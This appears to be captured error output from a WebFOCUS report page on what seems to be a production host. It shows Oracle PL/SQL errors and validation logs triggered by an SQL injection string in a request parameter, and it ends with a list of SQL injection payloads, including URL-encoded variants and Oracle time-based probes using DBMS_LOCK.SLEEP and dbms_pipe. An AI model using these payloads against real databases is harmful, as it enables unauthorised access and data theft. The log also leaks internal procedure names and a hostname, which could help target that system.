0 NUMBER OF RECORDS IN TABLE=        1  LINES=      1
(FOC1400) SQLCODE IS 6550 (HEX: 00001996)
(FOC1500)  :  ORA-06550: line 1, column 110:
(FOC1500)  :  PLS-00103: Encountered the symbol "OR" when expecting one of the
(FOC1500)  :  following:
(FOC1500)  :     ( - + case mod new not null <an identifier>
(FOC1500)  :     <a double-quoted delimited-identifier> <a bind variable>
(FOC1500)  :     continue avg count current exists max min prior sql stddev
(FOC1500)  :     sum variance execute forall merge time timestamp interval
(FOC1500)  :     date <a string literal with character set specification>
(FOC1500)  :     <a number> <a single-quoted SQL string> pipe
(FOC1500)  :     <an alternatively-quoted string literal with character set
L    (FOC1405) SQL PREPARE ERROR.
0 ERROR AT OR NEAR LINE     89  IN PROCEDURE psar_ctl
(FOC339) FAILURE ON -READ OR -WRITE: CHECK FILEDEF OR ALLOCATION FOR: PSAR_SEQ_GEN


0 NUMBER OF RECORDS IN TABLE=        1  LINES=      1
(FOC1400) SQLCODE IS 6550 (HEX: 00001996)
(FOC1500)  :  ORA-06550: line 1, column 126:
(FOC1500)  :  PLS-00103: Encountered the symbol "end-of-file" when expecting one of
(FOC1500)  :  the following:
(FOC1500)  :     ) , * & - + / at mod remainder rem <an exponent (**)> and or
(FOC1500)  :     || multiset
L    (FOC1405) SQL PREPARE ERROR.
0 ERROR AT OR NEAR LINE     89  IN PROCEDURE psar_ctl
(FOC339) FAILURE ON -READ OR -WRITE: CHECK FILEDEF OR ALLOCATION FOR: PSAR_SEQ_GEN

-->


WFFMT=PDF'%20OR%20'1'='2'%20||%20'%20--'

<!--startEdaMsgs-->
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE----------generic_bportal-------0
 VALIDATE---------- -------0
 VALIDATE----------bd-------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER-----test------------1
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER-----6821000708------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE----------PDF&#39; OR &#39;1&#39;&#61;&#39;2&#39; || &#39; --&#39;-------1
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE----------fac-www2-streetscape.fmr.com-------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE_NUMBER----- ------------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALIDATE----------rpt-1701681070574-------0
 VALIDATE---------- -------0
 VALIDATE----------true-------0
 VALIDATE----------12/05/2013-------0
 VALIDATE----------12/04/2023-------0
 VALIDATE---------- -------0
 VALIDATE---------- -------0
 VALID_CHK is------------- FAILED

<!--endEdaMsgs--></pre> 
</div> 
</div>
</body>
</html>
<!--InlineMessages URL4618 2023-12-04_05.35.39.344
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE----------generic_bportal-------0
VALIDATE---------- -------0
VALIDATE----------bd-------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER-----test------------1
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER-----6821000708------------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE_NUMBER----- ------------0
VALIDATE----------PDF' OR '1'='2' || ' --'-------1
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE_NUMBER----- ------------0
VALIDATE----------fac-www2-streetscape.fmr.com-------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE_NUMBER----- ------------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALIDATE----------rpt-1701681070574-------0
VALIDATE---------- -------0
VALIDATE----------true-------0
VALIDATE----------12/05/2013-------0
VALIDATE----------12/04/2023-------0
VALIDATE---------- -------0
VALIDATE---------- -------0
VALID_CHK is------------- FAILED

-->


' OR '1'='1' --
' OR 1=1 --
' OR '1'='1' || ' --
' or '1'='1' --
' OR '1'='1' || dbms_pipe.receive_message(('a'),10) --
' OR '1'='1' || DBMS_LOCK.SLEEP(10) --
%27%20OR%20%271%27%3D%271%27%20--
%2527%2520OR%2520%25271%2527%253D%25271%2527%2520--
27%20OR%20%271%27%3D%271%27%20--
